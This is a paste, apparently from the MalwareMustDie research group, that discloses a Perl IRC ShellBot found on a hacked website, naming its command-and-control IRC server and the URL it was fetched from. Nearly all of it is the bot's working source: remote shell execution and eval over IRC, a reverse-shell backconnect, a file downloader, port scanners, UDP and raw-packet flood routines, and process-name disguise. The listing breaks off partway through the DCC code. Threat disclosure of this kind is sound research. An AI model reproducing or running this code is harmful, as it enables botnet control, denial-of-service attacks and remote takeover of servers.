MalwareMustDie

Hacked Site with the US IRC Server'S Perl ShellBot

Feb 12th, 2014
1,990
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!!
  2. # Found this evil Perl IRC Shell/Backdoor announced in:
  3. # https://twitter.com/unixfreaxjp/status/433629833889714176
  4. # CnC is IRC server in 74.208.250.181 is in USA network: u17072928.onlinehome-server.com.|8560 |
  5. # 74.208.0.0/16 | ONEANDONE | US | ONEANDONE.NET | 1&1 INTERNET INC.
  6. #
  7. # PoC of the malicious activity is snipped code below..
  8. # Detected: Backdoors, Faking many IRC Clients, HTTP downloader, Port Scanner and DDoS tools
  9. #
  10. # --- snips / start evidence ----
  11.  
  12. $ curl http://121.119.182.119/icons/web.is
  13.  
  14. #!/usr/bin/perl
  15. my @mast3rs = ("w","R");
  16.  
  17. my @hostauth = ("w");
  18. my @admchan=("#bug");
  19.  
  20. my @server = ("74.208.250.181");
  21. $servidor= $server[rand scalar @server] unless $servidor;
  22.  
  23.  
  24. my $xeqt = "!";
  25. my $homedir = "/tmp";
  26. my $shellaccess = 1;
  27. my $xstats = 1;
  28. my $pacotes = 1;
  29. my $linas_max = 5;
  30. my $sleep = 6;
  31. my $portime = 4;
  32.  
  33. my @fakeps = ("ps x");
  34.  
  35. my @nickname = ("LINUX");
  36.  
  37. my @xident = ("KAST");
  38. my @xname = (`uname -a`);
  39.  
  40. #################
  41. # Random Ports
  42. #################
  43. my @rports = ("6667");
  44.  
  45. my @Mrx = ("¥001mIRC32 v5.91 K.Mardam-Bey¥001","¥001mIRC v6.2 Khaled Mardam-Bey¥001",
  46.    "¥001mIRC v6.03 Khaled Mardam-Bey¥001","¥001mIRC v6.14 Khaled Mardam-Bey¥001",
  47.    "¥001mIRC v6.15 Khaled Mardam-Bey¥001","¥001mIRC v6.16 Khaled Mardam-Bey¥001",
  48.    "¥001mIRC v6.17 Khaled Mardam-Bey¥001","¥001mIRC v6.21 Khaled Mardam-Bey¥001",
  49.    "¥001Snak for Macintosh 4.9.8 English¥001",
  50.    "¥001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC¥001",
  51.    "¥001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)¥001",
  52.    "¥001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]¥001",
  53.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]¥001",
  54.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]¥001",
  55.    "¥001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]¥001",
  56.    "¥001ircN 7.27 + 7.0 - -¥001","¥001..(argon/1g) :bitchx-1.0c17¥001",
  57.    "¥001ircN 8.00 - he tries to tell me what I put inside of me -¥001",
  58.    "¥001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people¥001",
  59.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!¥001",
  60.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!¥001",
  61.    "¥001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!¥001",
  62.    "¥001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!¥001",
  63.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!¥001",
  64.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!¥001",
  65.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!¥001",
  66.    "¥001bitchx-1.0c18 :tunnelvision/1.2¥001","¥001PnP 4.22 - http://www.pairc.com/¥001",
  67.    "¥001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1ツ?9] : Keep it to yourself!¥001",
  68.    "¥001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras¥001",
  69.    "¥001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet¥001",
  70.    "¥001irssi v0.8.10 - running on Linux i586¥001","¥001irssi v0.8.10 - running on FreeBSD i386¥001",
  71.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there¥001",
  72.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there¥001");
  73.  
  74. # Default quick scan ports
  75. my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
  76.  
  77. # xeQt
  78.  
  79. #my $nick = "Power";
  80. my $nick = $nickname[rand scalar @nickname];
  81. my $realname = $xname[rand scalar @xname];
  82. my $ircname = $xident[rand scalar @xident];
  83. my $porta = $rports[rand scalar @rports];
  84. my $xproc = $fakeps[rand scalar @fakeps];
  85. my $Mrx = $Mrx[rand scalar @Mrx];
  86. my $version = 'PowerBots (C) GohacK';
  87.  
  88. $SIG{'INT'} = 'IGNORE';
  89. $SIG{'HUP'} = 'IGNORE';
  90. $SIG{'TERM'} = 'IGNORE';
  91. $SIG{'CHLD'} = 'IGNORE';
  92. $SIG{'PS'} = 'IGNORE';
  93.  
  94.  
  95. use IO::Socket;
  96. use Socket;
  97. use IO::Select;
  98. chdir("$homedir");
  99. $servidor="$ARGV[0]" if $ARGV[0];
  100. $0="$xproc"."¥0";
  101. my $pid = fork;
  102. exit if $pid;
  103. die "[x] -> Cannot fork into background: $!" unless defined($pid);
  104. my %irc_servers;
  105. my %DCC;
  106. my $dcc_sel = new IO::Select->new();
  107.  
  108. sub getnick {
  109.   return "$nickname[rand scalar @nickname]".int(rand(20000));
  110. }
  111.  
  112. sub getstore ($$)
  113. {
  114.   my $url = shift;
  115.   my $file = shift;
  116.  
  117.   $http_stream_out = 1;
  118.   open(GET_OUTFILE, "> $file");
  119.   %http_loop_check = ();
  120.   _get($url);
  121.   close GET_OUTFILE;
  122.   return $main::http_get_result;
  123. }
  124. sub _get
  125. {
  126.   my $url = shift;
  127.   my $proxy = "";
  128.   grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  129.   if (($proxy eq "") && $url =m,^http://([^/:]+)(?::(¥d+))?(/¥S*)?$,) {
  130.     my $host = $1;
  131.     my $port = $2 || 80;
  132.     my $path = $3;
  133.     $path = "/" unless defined($path);
  134.     return _trivial_http_get($host, $port, $path);
  135.   } elsif ($proxy =m,^http://([^/:]+):(¥d+)(/¥S*)?$,) {
  136.     my $host = $1;
  137.     my $port = $2;
  138.     my $path = $url;
  139.     return _trivial_http_get($host, $port, $path);
  140.   } else {
  141.     return undef;
  142.   }
  143. }
  144. sub _trivial_http_get
  145. {
  146.   my($host, $port, $path) = @_;
  147.   my($AGENT, $VERSION, $p);
  148.   #print "HOST=$host, PORT=$port, PATH=$path¥n";
  149.  
  150.   $AGENT = "get-minimal";
  151.   $VERSION = "20000118";
  152.  
  153.   $path =s/ /%20/g;
  154.  
  155.   require IO::Socket;
  156.   local($^W) = 0;
  157.   my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto   => 'tcp', Timeout  => 60) || return;
  158.  
  159.   $sock->autoflush;
  160.   my $netloc = $host;
  161.   $netloc .= ":$port" if $port != 80;
  162.   my $request = "GET $path HTTP/1.0¥015¥012"
  163.               . "Host: $netloc¥015¥012"
  164.               . "User-Agent: $AGENT/$VERSION/u¥015¥012";
  165.   $request .= "Pragma: no-cache¥015¥012" if ($main::http_no_cache);
  166.   $request .= "¥015¥012";
  167.   print $sock $request;
  168.   my $buf = "";
  169.   my $n;
  170.   my $b1 = "";
  171.   while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
  172.     if ($b1 eq "") {
  173.       $b1 = $buf;
  174.       $buf =s/.+?¥015?¥012¥015?¥012//s;
  175.     }
  176.     if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  177.   }
  178.   return undef unless defined($n);
  179.   $main::http_get_result = 200;
  180.   if ($b1 =m,^HTTP/¥d+¥.¥d+¥s+(¥d+)[^¥012]*¥012,) {
  181.     $main::http_get_result = $1;
  182.     # print "CODE=$main::http_get_result¥n$b1¥n";
  183.     if ($main::http_get_result =/^30[1237]/ && $b1 =/¥012Location:¥s*(¥S+)/) {
  184.       my $url = $1;
  185.       return undef if $http_loop_check{$url}++;
  186.       return _get($url);
  187.     }
  188.     return undef unless $main::http_get_result =/^2/;
  189.   }
  190.   return $buf;
  191. }
  192. $sel_cliente = IO::Select->new();
  193. sub sendraw {
  194.   if ($#_ == '1') {
  195.     my $socket = $_[0];
  196.     print $socket "$_[1]¥n";
  197.   } else {
  198.       print $IRC_cur_socket "$_[0]¥n";
  199.   }
  200. }
  201. sub conectar {
  202.    my $meunick = $_[0];
  203.    my $servidor_con = $_[1];
  204.    my $porta_con = $_[2];
  205.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  206.    if (defined($IRC_socket)) {
  207.      $IRC_cur_socket = $IRC_socket;
  208.      $IRC_socket->autoflush(1);
  209.      $sel_cliente->add($IRC_socket);
  210.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  211.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  212.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  213.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  214.      nick("$meunick");
  215.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  216.      sleep 2;
  217.    }
  218. }
  219. my $line_temp;
  220. while( 1 ) {
  221.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  222.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  223.    &DCC::connections;
  224.    my @ready = $sel_cliente->can_read(0.6);
  225.    next unless(@ready);
  226.    foreach $fh (@ready) {
  227.      $IRC_cur_socket = $fh;
  228.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  229.      $nread = sysread($fh, $msg, 4096);
  230.      if ($nread == 0) {
  231.         $sel_cliente->remove($fh);
  232.         $fh->close;
  233.         delete($irc_servers{$fh});
  234.      }
  235.      @lines = split (/¥n/, $msg);
  236.      for(my $c=0; $c<= $#lines; $c++) {
  237.        $line = $lines[$c];
  238.        $line=$line_temp.$line if ($line_temp);
  239.        $line_temp='';
  240.        $line =s/¥r$//;
  241.        unless ($c == $#lines) {
  242.          parse("$line");
  243.        } else {
  244.            if ($#lines == 0) {
  245.              parse("$line");
  246.            } elsif ($lines[$c] =/¥r$/) {
  247.                parse("$line");
  248.            } elsif ($line =/^(¥S+) NOTICE AUTH :¥*¥*¥*/) {
  249.                parse("$line");
  250.            } else {
  251.                $line_temp = $line;
  252.            }
  253.        }
  254.       }
  255.    }
  256. }
  257.  
  258. sub parse {
  259.    my $servarg = shift;
  260.    if ($servarg =/^PING ¥:(.*)/) {
  261.      sendraw("PONG :$1");
  262.    } elsif ($servarg =/^¥:(.+?)¥!(.+?)¥@(.+?) PRIVMSG (.+?) ¥:(.+)/) {
  263.        my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5;
  264.        if ($args =/^¥001VERSION¥001$/) {
  265.          notice("$pn", "".$Mrx."");
  266.        }
  267.        elsif ($args =/^¥001PING¥s+(¥d+)¥001$/) {
  268.          notice("$pn", "¥001PONG¥001");
  269.        }
  270.        if (grep {$_ =/^¥Q$hostnam3¥E$/i } @hostauth) {
  271.        if (grep {$_ =/^¥Q$pn¥E$/i } @mast3rs) {
  272.          if ($onde eq "$meunick"){
  273.            shell("$pn", "$args");
  274.         }
  275.     if ($args =/^!(.*)/){
  276.        ircase("$pn","$chan","$1");
  277.     }
  278.         if ($args =/^(¥Q$meunick¥E|¥Q$xeqt¥E)¥s+(.*)/ ) {
  279.             my $natrix = $1;
  280.             my $arg = $2;
  281.             if ($arg =/^¥!(.*)/) {
  282.               ircase("$pn","$onde","$1");
  283.             } elsif ($arg =/^¥@(.*)/) {
  284.                 $ondep = $onde;
  285.                 $ondep = $pn if $onde eq $meunick;
  286.                 bfunc("$ondep","$1");
  287.             } else {
  288.                 shell("$onde", "$arg");
  289.             }
  290.           }
  291.         }
  292.       }
  293.    } elsif ($servarg =/^¥:(.+?)¥!(.+?)¥@(.+?)¥s+NICK¥s+¥:(¥S+)/i) {
  294.        if (lc($1) eq lc($meunick)) {
  295.          $meunick=$4;
  296.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  297.        }
  298.    } elsif ($servarg =m/^¥:(.+?)¥s+433/i) {
  299.        $meunick = getnick();
  300.        nick("".$meunick."-");
  301.    } elsif ($servarg =m/^¥:(.+?)¥s+001¥s+(¥S+)¥s/i) {
  302.        $meunick = $2;
  303.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  304.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  305.        foreach my $canal (@admchan){
  306.          sendraw("JOIN $canal muietie");
  307.        }
  308.    }
  309. }
  310. sub bfunc {
  311.   my $printl = $_[0];
  312.   my $funcarg = $_[1];
  313.   if (my $pid = fork) {
  314.      waitpid($pid, 0);
  315.   } else {
  316.       if (fork)
  317.        {
  318.          exit;
  319.        }
  320.    else
  321.    {
  322.       # Quick scan
  323.            if ($funcarg =/^ps (.*)/) {
  324.              my $hostip="$1";
  325.         sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 default");
  326.              my (@aberta, %porta_banner);
  327.              foreach my $porta (@portas)  {
  328.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  329.                 if ($scansock) {
  330.                    push (@aberta, $porta);
  331.                    $scansock->close;
  332.          sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  333.                 }
  334.              }
  335.              if (@aberta) {
  336.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
  337.              } else {
  338.                  sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002[x]¥0034 No open ports found on¥002 $1");
  339.              }
  340.            }
  341.       # NMAP, lol
  342.            elsif ($funcarg =/^nmap¥s+(.*)¥s+(¥d+)¥s+(¥d+)/)
  343.       {
  344.               my $hostname="$1";
  345.               my $portstart = "$2";
  346.                my $portend = "$3";
  347.                my (@abertas, %porta_banner);
  348.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312xMap Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 $2-$3");
  349.                foreach my $porta ($portstart..$portend)
  350.              {
  351.                my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  352.                if ($scansock) {
  353.                  push (@abertas, $porta);
  354.                  $scansock->close;
  355.                  if ($xstats)
  356.        {
  357.                    sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  358.                  }
  359.                }
  360.              }
  361.              if (@abertas) {
  362.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Scan Complate¥003¥002");
  363.              } else {
  364.                sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002¥00312No ports found..¥002");
  365.              }
  366.             }
  367.       # Remove
  368.       elsif ($funcarg =/^rm/)
  369.       {
  370.          system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*");
  371.       sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Quickdel)¥002¥00314 Removed files and folders ");
  372.       }
  373.       # Version
  374.       elsif ($funcarg =/^version/)
  375.       {
  376.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Version)¥002¥00314 $version ");
  377.       }
  378.       # Download
  379.            elsif ($funcarg =/^down¥s+(.*)¥s+(.*)/)
  380.       {
  381.               getstore("$1", "$2");
  382.               sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Download)¥002¥00314 Page: $2 (File: $1)") if ($xstats);
  383.            }
  384.        # Udp
  385.             elsif ($funcarg =/^udp¥s+(.*)¥s+(¥d+)¥s+(¥d+)/) {
  386.               return unless $pacotes;
  387.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  388.               my $alvo=inet_aton("$1");
  389.               my $porta = "$2";
  390.               my $tempo = "$3";
  391.               my $pacote;
  392.               my $pacotese;
  393.               my $fim = time + $tempo;
  394.               my $pacota = 1;
  395.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP DDoSing)¥003 Attacking¥002: $1 - ¥002Time¥002: $tempo"."seconds");
  396.               while (($pacota == "1") && ($pacotes == "1")) {
  397.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
  398.                 $pacote=$rand x $rand x $rand;
  399.                 $porta = int(rand 65000) +1 if ($porta == "0");
  400.                 send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
  401.               }
  402.               if ($xstats)
  403.               {
  404.                sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP Complete):¥003¥002 $1 - ¥002Sendt¥002: $pacotese"."kb - ¥002Time¥002: $tempo"."seconds");
  405.              }
  406.             }
  407.  
  408.        # Backconnect
  409.             elsif ($funcarg =/^back¥s+(.*)¥s+(¥d+)/) {
  410.               my $host = "$1";
  411.               my $porta = "$2";
  412.               my $proto = getprotobyname('tcp');
  413.               my $iaddr = inet_aton($host);
  414.               my $paddr = sockaddr_in($porta, $iaddr);
  415.               my $shell = "/bin/sh -i";
  416.               if ($^O eq "MSWin32") {
  417.                 $shell = "cmd.exe";
  418.               }
  419.               socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  420.               connect(SOCKET, $paddr) or die "connect: $!";
  421.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002[x] ->¥0034 Injection ...");
  422.               open(STDIN, ">&SOCKET");
  423.               open(STDOUT, ">&SOCKET");
  424.               open(STDERR, ">&SOCKET");
  425.               system("$shell");
  426.          system("cd /tmp/.mrx");
  427.               close(STDIN);
  428.               close(STDOUT);
  429.               close(STDERR);
  430.             }
  431.            exit;
  432.        }
  433.   }
  434. }
  435.  
  436. sub ircase {
  437.   my ($kem, $printl, $case) = @_;
  438.  
  439.    if ($case =/^join (.*)/) {
  440.      j("$1");
  441.    }
  442.    elsif ($case =/^part (.*)/) {
  443.       p("$1");
  444.    }
  445.    elsif ($case =/^rejoin¥s+(.*)/) {
  446.       my $chan = $1;
  447.       if ($chan =/^(¥d+) (.*)/) {
  448.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  449.           p("$2");
  450.           j("$2");
  451.         }
  452.       } else {
  453.           p("$chan");
  454.           j("$chan");
  455.       }
  456.    }
  457.    elsif ($case =/^op/) {
  458.       op("$printl", "$kem") if $case eq "op";
  459.       my $oarg = substr($case, 3);
  460.       op("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  461.    }
  462.    elsif ($case =/^deop/) {
  463.       deop("$printl", "$kem") if $case eq "deop";
  464.       my $oarg = substr($case, 5);
  465.       deop("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  466.    }
  467.    elsif ($case =/^voice/) {
  468.       voice("$printl", "$kem") if $case eq "voice";
  469.       $oarg = substr($case, 6);
  470.       voice("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  471.    }
  472.    elsif ($case =/^devoice/) {
  473.       devoice("$printl", "$kem") if $case eq "devoice";
  474.       $oarg = substr($case, 8);
  475.       devoice("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  476.    }
  477.    elsif ($case =/^msg¥s+(¥S+) (.*)/) {
  478.       msg("$1", "$2");
  479.    }
  480.    elsif ($case =/^flood¥s+(¥d+)¥s+(¥S+) (.*)/) {
  481.       for (my $cf = 1; $cf <= $1; $cf++) {
  482.         msg("$2", "$3");
  483.       }
  484.    }
  485.    elsif ($case =/^ctcpflood¥s+(¥d+)¥s+(¥S+) (.*)/) {
  486.       for (my $cf = 1; $cf <= $1; $cf++) {
  487.         ctcp("$2", "$3");
  488.       }
  489.    }
  490.    elsif ($case =/^ctcp¥s+(¥S+) (.*)/) {
  491.       ctcp("$1", "$2");
  492.    }
  493.    elsif ($case =/^invite¥s+(¥S+) (.*)/) {
  494.       invite("$1", "$2");
  495.    }
  496.    elsif ($case =/^nick (.*)/) {
  497.       nick("$1");
  498.    }
  499.    elsif ($case =/^jump¥s+(¥S+)¥s+(¥S+)/) {
  500.        conectar("$2", "$1", 6667);
  501.    }
  502.    elsif ($case =/^send¥s+(¥S+)¥s+(¥S+)/) {
  503.       DCC::SEND("$1", "$2");
  504.    }
  505.    elsif ($case =/^raw (.*)/) {
  506.       sendraw("$1");
  507.    }
  508.    elsif ($case =/^eval (.*)/) {
  509.       eval "$1";
  510.    }
  511.    elsif ($case =/^rj¥s+(¥S+)¥s+(¥d+)/) {
  512.     sleep int(rand($2));
  513.     j("$1");
  514.    }
  515.    elsif ($case =/^rp¥s+(¥S+)¥s+(¥d+)/) {
  516.     sleep int(rand($2));
  517.     p("$1");
  518.    }
  519.    elsif ($case =/^quit/) {
  520.      quit();
  521.    }
  522.    elsif ($case =/^rand/) {
  523.     my $novonick = getnick();
  524.      nick("$novonick");
  525.    }
  526.    elsif ($case =/^stat (.*)/) {
  527.      if ($1 eq "on") {
  528.       $xstats = 1;
  529.       msg("$printl", "Satus enabled");
  530.      } elsif ($1 eq "off") {
  531.       $xstats = 0;
  532.       msg("$printl", "Status disable");
  533.      }
  534.    }
  535.    elsif ($case =/^bang (.*)/) {
  536.      if ($1 eq "on") {
  537.       $pacotes = 1;
  538.       msg("$printl", "[x] Bang mode enabled") if ($xstats == "1");
  539.      } elsif ($1 eq "off") {
  540.       $pacotes = 0;
  541.       msg("$printl", "[x] Bang mode disabled") if ($xstats == "1");
  542.      }
  543.    }
  544. }
  545. sub shell {
  546.   return unless $shellaccess;
  547.   my $printl=$_[0];
  548.   my $comando=$_[1];
  549.   if ($comando =/cd (.*)/) {
  550.     chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
  551.     return;
  552.   }
  553.   elsif ($pid = fork) {
  554.      waitpid($pid, 0);
  555.   } else {
  556.       if (fork) {
  557.          exit;
  558.        } else {
  559.            my @resp=`$comando 2>&1 3>&1`;
  560.            my $c=0;
  561.            foreach my $linha (@resp) {
  562.              $c++;
  563.              chop $linha;
  564.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  565.              if ($c >= "$linas_max") {
  566.                $c=0;
  567.                sleep $sleep;
  568.              }
  569.            }
  570.            exit;
  571.        }
  572.   }
  573. }
  574.  
  575. sub attacker {
  576.   my $iaddr = inet_aton($_[0]);
  577.   my $msg = 'B' x $_[1];
  578.   my $ftime = $_[2];
  579.   my $cp = 0;
  580.   my (%pacotes);
  581.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  582.  
  583.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  584.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  585.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  586.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  587.   return(undef) if $cp == 4;
  588.   my $itime = time;
  589.   my ($cur_time);
  590.   while ( 1 ) {
  591.      for (my $porta = 1; $porta <= 65535; $porta++) {
  592.        $cur_time = time - $itime;
  593.        last if $cur_time >= $ftime;
  594.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
  595.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
  596.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
  597.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
  598.        for (my $pc = 3; $pc <= 255;$pc++) {
  599.          next if $pc == 6;
  600.          $cur_time = time - $itime;
  601.          last if $cur_time >= $ftime;
  602.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  603.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
  604.        }
  605.      }
  606.      last if $cur_time >= $ftime;
  607.   }
  608.   return($cur_time, %pacotes);
  609. }
  610.  
  611. sub action {
  612.    return unless $#_ == 1;
  613.    sendraw("PRIVMSG $_[0] :¥001ACTION $_[1]¥001");
  614. }
  615. sub ctcp {
  616.    return unless $#_ == 1;
  617.    sendraw("PRIVMSG $_[0] :¥001$_[1]¥001");
  618. }
  619. sub msg {
  620.    return unless $#_ == 1;
  621.    sendraw("PRIVMSG $_[0] :$_[1]");
  622. }
  623. sub notice {
  624.    return unless $#_ == 1;
  625.    sendraw("NOTICE $_[0] :$_[1]");
  626. }
  627. sub op {
  628.    return unless $#_ == 1;
  629.    sendraw("MODE $_[0] +o $_[1]");
  630. }
  631. sub deop {
  632.    return unless $#_ == 1;
  633.    sendraw("MODE $_[0] -o $_[1]");
  634. }
  635. sub hop {
  636.     return unless $#_ == 1;
  637.    sendraw("MODE $_[0] +h $_[1]");
  638. }
  639. sub dehop {
  640.    return unless $#_ == 1;
  641.    sendraw("MODE $_[0] +h $_[1]");
  642. }
  643. sub voice {
  644.    return unless $#_ == 1;
  645.    sendraw("MODE $_[0] +v $_[1]");
  646. }
  647. sub devoice {
  648.    return unless $#_ == 1;
  649.    sendraw("MODE $_[0] -v $_[1]");
  650. }
  651. sub ban {
  652.    return unless $#_ == 1;
  653.    sendraw("MODE $_[0] +b $_[1]");
  654. }
  655. sub unban {
  656.    return unless $#_ == 1;
  657.    sendraw("MODE $_[0] -b $_[1]");
  658. }
  659. sub kick {
  660.    return unless $#_ == 1;
  661.    sendraw("KICK $_[0] $_[1] :$_[2]");
  662. }
  663. sub modo {
  664.    return unless $#_ == 0;
  665.    sendraw("MODE $_[0] $_[1]");
  666. }
  667. sub mode { modo(@_); }
  668. sub j { &join(@_); }
  669. sub join {
  670.    return unless $#_ == 0;
  671.    sendraw("JOIN $_[0]");
  672. }
  673. sub p { part(@_); }
  674. sub part {sendraw("PART $_[0]");}
  675. sub nick {
  676.   return unless $#_ == 0;
  677.   sendraw("NICK $_[0]");
  678. }
  679. sub invite {
  680.    return unless $#_ == 1;
  681.    sendraw("INVITE $_[1] $_[0]");
  682. }
  683. sub topico {
  684.    return unless $#_ == 1;
  685.    sendraw("TOPIC $_[0] $_[1]");
  686. }
  687. sub topic { topico(@_); }
  688. sub whois {
  689.   return unless $#_ == 0;
  690.   sendraw("WHOIS $_[0]");
  691. }
  692. sub who {
  693.   return unless $#_ == 0;
  694.   sendraw("WHO $_[0]");
  695. }
  696. sub names {
  697.   return unless $#_ == 0;
  698.   sendraw("NAMES $_[0]");
  699. }
  700. sub away {
  701.   sendraw("AWAY $_[0]");
  702. }
  703. sub back { away(); }
  704. sub quit {
  705.   sendraw("QUIT :$_[0]");
  706.   exit;
  707. }
  708.  
  709. package DCC;
  710. sub connections {
  711.    my @ready = $dcc_sel->can_read(1);
  712. #   return unless (@ready);
  713.    foreach my $fh (@ready) {
  714.      my $dcctipo = $DCC{$fh}{tipo};
  715.      my $arquivo = $DCC{$fh}{arquivo};
  716.      my $bytes = $DCC{$fh}{bytes};
  717.      my $cur_byte = $DCC{$fh}{curbyte};
  718.      my $nick = $DCC{$fh}{nick};
  719.      my $msg;
  720.      my $nread = sysread($fh, $msg, 10240);
  721.      if ($nread == 0 and $dcctipo =/^(get|sendcon)$/) {
  722.         $DCC{$fh}{status} = "Cancelado";
  723.         $DCC{$fh}{ftime} = time;
  724.         $dcc_sel->remove($fh);
  725.         $fh->close;
  726.         next;
  727.      }
  728.      if ($dcctipo eq "get") {
  729.         $DCC{$fh}{curbyte} += length($msg);
  730.  
  731.         my $cur_byte = $DCC{$fh}{curbyte};
  732.  
  733.         open(FILE, ">> $arquivo");
  734.         print FILE "$msg" if ($cur_byte <= $bytes);
  735.         close(FILE);
  736.  
  737.         my $packbyte = pack("N", $cur_byte);
  738.         print $fh "$packbyte";
  739.  
  740.         if ($bytes == $cur_byte) {
  741.            $dcc_sel->remove($fh);
  742.            $fh->close;
  743.            $DCC{$fh}{status} = "Recebido";
  744.            $DCC{$fh}{ftime} = time;
  745.            next;
  746.         }
  747.      } elsif ($dcctipo eq "send") {
  748.           my $send = $fh->accept;
  749.           $send->autoflush(1);
  750.           $dcc_sel->add($send);
  751.           $dcc_sel->remove($fh);
  752.           $DCC{$send}{tipo} = 'sendcon';
  753.           $DCC{$send}{itime} = time;
  754.           $DCC{$send}{nick} = $nick;
  755.           $DCC{$send}{bytes} = $bytes;
  756.           $DCC{$send}{curbyte} = 0;
  757.           $DCC{$send}{arquivo} = $arquivo;
  758.           $DCC{$send}{ip} = $send->peerhost;
  759.           $DCC{$send}{porta} = $send->peerport;
  760.           $DCC{$send}{status} = "Enviando";
  761.           open(FILE, "< $arquivo");
  762.           my $fbytes;
  763.           read(FILE, $fbytes, 1024);
  764.           print $send "$fbytes";
  765.           close FILE;
  766. #          delete($DCC{$fh});
  767.      } elsif ($dcctipo eq 'sendcon') {
  768.           my $bytes_sended = unpack("N", $msg);
  769.           $DCC{$fh}{curbyte} = $bytes_sended;
